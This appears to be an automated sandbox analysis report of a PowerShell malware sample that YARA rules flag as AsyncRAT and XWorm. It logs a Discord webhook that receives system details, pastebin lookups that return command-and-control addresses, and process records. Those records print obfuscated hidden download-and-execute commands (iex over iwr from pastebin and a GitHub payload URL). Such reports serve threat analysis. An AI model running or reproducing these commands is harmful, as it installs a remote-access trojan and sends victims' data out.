                                                                                    2024-10-15 13:54:18 UTC295OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 74 69 6e 61 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 53 54 50 35 53 45 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41 4c
                                                                                    Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** STP5SE\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FAL
                                                                                    2024-10-15 13:54:18 UTC1358INHTTP/1.1 204 No Content
                                                                                    Date: Tue, 15 Oct 2024 13:54:18 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    set-cookie: __dcfduid=f8e289c28afc11ef8e220e9eb858adde; Expires=Sun, 14-Oct-2029 13:54:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1729000459
                                                                                    x-ratelimit-reset-after: 1
                                                                                    via: 1.1 google
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oA%2FoXDYof%2FVbpdVVwaX%2B0w6FO5X0mj17nf6Onxsd8dZZ1f3vz89Lo5skk29Votokm%2Bflqu6hUZyban1ctXKKaLb2Vi61Hnvq6DSZihf2%2FaMBIalRPW5cn8FUUwkB"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                    Set-Cookie: __sdcfduid=f8e289c28afc11ef8e220e9eb858adde00662a2be4acc4e530ebc9a645c8d108950f0aa236c218456bcdd9af0367487f; Expires=Sun, 14-Oct-2029 13:54:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                    Set-Cookie: __cfruid=c81e61d1b1beef6247582d9bf320c51e0fea5da6-1729000458; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    2024-10-15 13:54:18 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 49 36 4f 6d 77 5f 59 61 4a 37 68 50 62 47 37 7a 75 44 48 6e 58 44 5f 68 55 36 41 69 79 72 2e 39 75 74 49 54 76 54 74 64 62 35 41 2d 31 37 32 39 30 30 30 34 35 38 33 39 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 63 65 30 30 39 39 38 36 62 36 31 2d 44 46 57 0d 0a 0d 0a
                                                                                    Data Ascii: Set-Cookie: _cfuvid=I6Omw_YaJ7hPbG7zuDHnXD_hU6Aiyr.9utITvTtdb5A-1729000458397-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304ce009986b61-DFW


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.949723162.159.138.2324435812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 13:54:25 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Content-Type: application/json
                                                                                    Host: discord.com
                                                                                    Content-Length: 295
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 13:54:25 UTC295OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 74 69 6e 61 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 53 54 50 35 53 45 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41 4c
                                                                                    Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** STP5SE\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FAL
                                                                                    2024-10-15 13:54:25 UTC1356INHTTP/1.1 204 No Content
                                                                                    Date: Tue, 15 Oct 2024 13:54:25 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    set-cookie: __dcfduid=fd5d4b728afc11ef8a3d4ea617983865; Expires=Sun, 14-Oct-2029 13:54:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1729000467
                                                                                    x-ratelimit-reset-after: 1
                                                                                    via: 1.1 google
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z6%2FddeAA4NhMdFEbPDQWzPsP1wzl9Wqon1dskdActn4Cl%2F%2Badre403n4GcHMR5BLo05o7H2iidJ2JLQuGV9yU1MiDGn6ISln71tfwbII7yif66FXTAl%2BaAJ4gk4B"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                    Set-Cookie: __sdcfduid=fd5d4b728afc11ef8a3d4ea6179838654323ffe784223a2c6ec448ad7224e415fb80696181a33090613456601daec4eb; Expires=Sun, 14-Oct-2029 13:54:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                    Set-Cookie: __cfruid=10dbd1eb829064c3644d90849112d605459fb980-1729000465; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    2024-10-15 13:54:25 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6b 65 36 69 2e 4a 74 55 67 4c 50 48 33 76 4f 4e 37 78 69 46 6d 5f 2e 57 76 75 35 37 6a 64 41 53 7a 73 5f 72 61 48 39 5f 42 68 63 2d 31 37 32 39 30 30 30 34 36 35 39 31 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 64 30 64 63 66 37 38 65 37 61 32 2d 44 46 57 0d 0a 0d 0a
                                                                                    Data Ascii: Set-Cookie: _cfuvid=ke6i.JtUgLPH3vON7xiFm_.Wvu57jdASzs_raH9_Bhc-1729000465910-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304d0dcf78e7a2-DFW


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.949724104.20.3.2354435584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 13:54:32 UTC74OUTGET /raw/zNCj2Utm HTTP/1.1
                                                                                    Host: pastebin.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 13:54:33 UTC397INHTTP/1.1 200 OK
                                                                                    Date: Tue, 15 Oct 2024 13:54:33 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    x-frame-options: DENY
                                                                                    x-content-type-options: nosniff
                                                                                    x-xss-protection: 1;mode=block
                                                                                    cache-control: public, max-age=1801
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 116
                                                                                    Last-Modified: Tue, 15 Oct 2024 13:52:37 GMT
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d304d3c8b71e5f2-DFW
                                                                                    2024-10-15 13:54:33 UTC34INData Raw: 31 63 0d 0a 78 72 66 63 78 69 71 75 71 63 70 71 68 61 2e 64 64 6e 73 2e 6e 65 74 3a 34 34 31 31 0d 0a
                                                                                    Data Ascii: 1cxrfcxiquqcpqha.ddns.net:4411
                                                                                    2024-10-15 13:54:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.949725104.20.3.2354435584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 13:54:33 UTC50OUTGET /raw/6db99fAK HTTP/1.1
                                                                                    Host: pastebin.com
                                                                                    2024-10-15 13:54:33 UTC397INHTTP/1.1 200 OK
                                                                                    Date: Tue, 15 Oct 2024 13:54:33 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    x-frame-options: DENY
                                                                                    x-content-type-options: nosniff
                                                                                    x-xss-protection: 1;mode=block
                                                                                    cache-control: public, max-age=1801
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 115
                                                                                    Last-Modified: Tue, 15 Oct 2024 13:52:38 GMT
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d304d417dbc6b85-DFW
                                                                                    2024-10-15 13:54:33 UTC23INData Raw: 31 31 0d 0a 34 35 2e 31 34 34 2e 33 31 2e 31 30 35 3a 34 34 33 0d 0a
                                                                                    Data Ascii: 1145.144.31.105:443
                                                                                    2024-10-15 13:54:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:09:53:20
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1"
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:09:53:20
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:09:53:23
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline"
                                                                                    Imagebase:0x7ff7fac30000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:09:53:23
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5818.tmp" "c:\Users\user\AppData\Local\Temp\thvmfbzv\CSC2C6CB80D24664034BBA8B61A4D73B8EB.TMP"
                                                                                    Imagebase:0x7ff703ea0000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:09:53:59
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                    Imagebase:0x7ff639210000
                                                                                    File size:23'040 bytes
                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:09:54:00
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\forfiles.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                    Imagebase:0x7ff6e0850000
                                                                                    File size:52'224 bytes
                                                                                    MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:09:54:00
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:09:54:00
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:10
                                                                                    Start time:09:54:00
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:13
                                                                                    Start time:09:54:03
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Unknown_Malware_Sample_Jul17_2, Description: Detects unknown malware sample with pastebin RAW URL, Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:14
                                                                                    Start time:09:54:03
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:15
                                                                                    Start time:09:54:07
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline"
                                                                                    Imagebase:0x7ff7fac30000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:09:54:07
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A1.tmp" "c:\Users\user\AppData\Local\Temp\s4dvafav\CSC36361158E42F4D2FBFD4DCE2A4FFFFB.TMP"
                                                                                    Imagebase:0x7ff703ea0000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:09:54:08
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\forfiles.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                    Imagebase:0x7ff6e0850000
                                                                                    File size:52'224 bytes
                                                                                    MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:18
                                                                                    Start time:09:54:08
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:19
                                                                                    Start time:09:54:08
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:20
                                                                                    Start time:09:54:08
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Executed Functions

                                                                                      Function 00007FF887CDE7E6 Relevance: .5, Instructions: 474COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 91e57bbc00e56f859f27636f5b80467da920fabb3ae86629d11cf62ec04f9b19
                                                                                      • Instruction ID: 8cb1ef110f334817d61cc8e5649f319e1197bf56b9cf4e5a62450be8f9cad4aa
                                                                                      • Opcode Fuzzy Hash: 91e57bbc00e56f859f27636f5b80467da920fabb3ae86629d11cf62ec04f9b19
                                                                                      • Instruction Fuzzy Hash: E3F18430508A4D8FEBA8DF28C8557E97BE2FF54350F04427AD85DC7296DB38A945CB82
                                                                                      Function 00007FF887CDF592 Relevance: .5, Instructions: 460COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1930586376.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9575a85a3a8b10eab75d863aea3254ea11302af6848ed1dc47700f27f889dadd
                                                                                      • Instruction ID: c2e2d95e38db7467d9a62d945279f6f1b9076412ba16bf805320631314a6e7ae
                                                                                      • Opcode Fuzzy Hash: 9575a85a3a8b10eab75d863aea3254ea11302af6848ed1dc47700f27f889dadd
                                                                                      • Instruction Fuzzy Hash: 47E1A330908A498FEBA8DF28C8557E97BE2FF54350F14427AD85DC7296DB789841C782
                                                                                      Function 00007FF887DA7392 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1931160991.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ
                                                                                      • API String ID: 0-3573994042
